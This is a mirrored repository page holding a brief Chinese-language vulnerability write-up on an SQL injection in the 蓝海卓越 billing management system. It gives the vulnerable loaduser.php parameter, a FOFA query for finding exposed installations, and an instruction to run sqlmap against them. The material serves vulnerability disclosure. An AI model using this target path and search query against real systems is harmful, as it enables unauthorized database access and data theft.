admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/蓝海卓越/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

752 B
Raw Permalink Blame History

蓝海卓越 计费管理系统loaduser存在SQL注入漏洞

一、漏洞简介

蓝海卓越计费管理系统loaduser存在SQL注入漏洞

二、影响版本

  • 蓝海卓越 计费管理系统

三、资产测绘

  • fofatitle=="蓝海卓越计费管理系统"
  • 特征

1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png

四、漏洞复现

/ajax/loaduser.php?UserName=1

直接sqlmap跑

1716368373510-b0b02332-cdaa-484d-9bce-f89aae5681d2.png

更新: 2024-05-23 12:33:24
原文: https://www.yuque.com/xiaokp7/ocvun2/dp8fzx7t8uhgpsam